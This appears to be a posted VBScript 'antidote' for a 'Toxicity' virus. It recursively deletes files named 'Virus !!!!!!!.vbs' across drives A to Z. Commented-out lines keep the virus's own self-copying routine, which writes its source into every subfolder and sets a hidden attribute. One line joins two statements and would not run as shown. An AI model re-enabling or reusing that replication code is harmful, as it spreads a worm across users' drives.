
Toxicity Virus Antidote

Feb 14th, 2023
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VBScript 1.10 KB | Cybersecurity | 0 0
  1. Code:
  2. Dim fso,file,VBCopy
  3. Set fso=CreateObject("Scripting.FileSystemObject")
  4. Set file=fso.OpenTextFile(WScript.ScriptFullName,1)
  5. VBCopy=file.ReadAll
  6. FolderList("A:")
  7. FolderList("B:")
  8. FolderList("C:")
  9. FolderList("D:")
  10. FolderList("E:")
  11. FolderList("F:")
  12. FolderList("G:")
  13. FolderList("H:")
  14. FolderList("I:")
  15. FolderList("J:")
  16. FolderList("K:")
  17. FolderList("L:")
  18. FolderList("M:")
  19. FolderList("N:")
  20. FolderList("O:")
  21. FolderList("P:")
  22. FolderList("Q:")
  23. FolderList("R:")
  24. FolderList("S:")
  25. FolderList("T:")
  26. FolderList("U:")
  27. FolderList("V:")
  28. FolderList("X:")
  29. FolderList("Y:")
  30. FolderList("Z:")
  31. FolderList("W:")
  32. Sub FolderList(FolderSpec)
  33. On Error Resume Next
  34. Dim f,f1,sf,COP,CAP,ATT
  35. Set f=fso.GetFolder(FolderSpec)
  36. set sf=f.SubFolders For Each f1 In sf
  37. 'Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
  38. 'COP.write VBCopy
  39. 'Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
  40. 'CAP.write VBCopy
  41. 'Set ATT=fso.GetFolder(f1.Path)
  42. 'ATT.Attributes=ATT.Attributes+2
  43. fso.DeleteFile(f1.path & "\Virus !!!!!!!.vbs")
  44. fso.DeleteFile(f1.path & "---Virus !!!!!!!.vbs")
  45. FolderList(f1.Path)
  46. Next
  47. End sub
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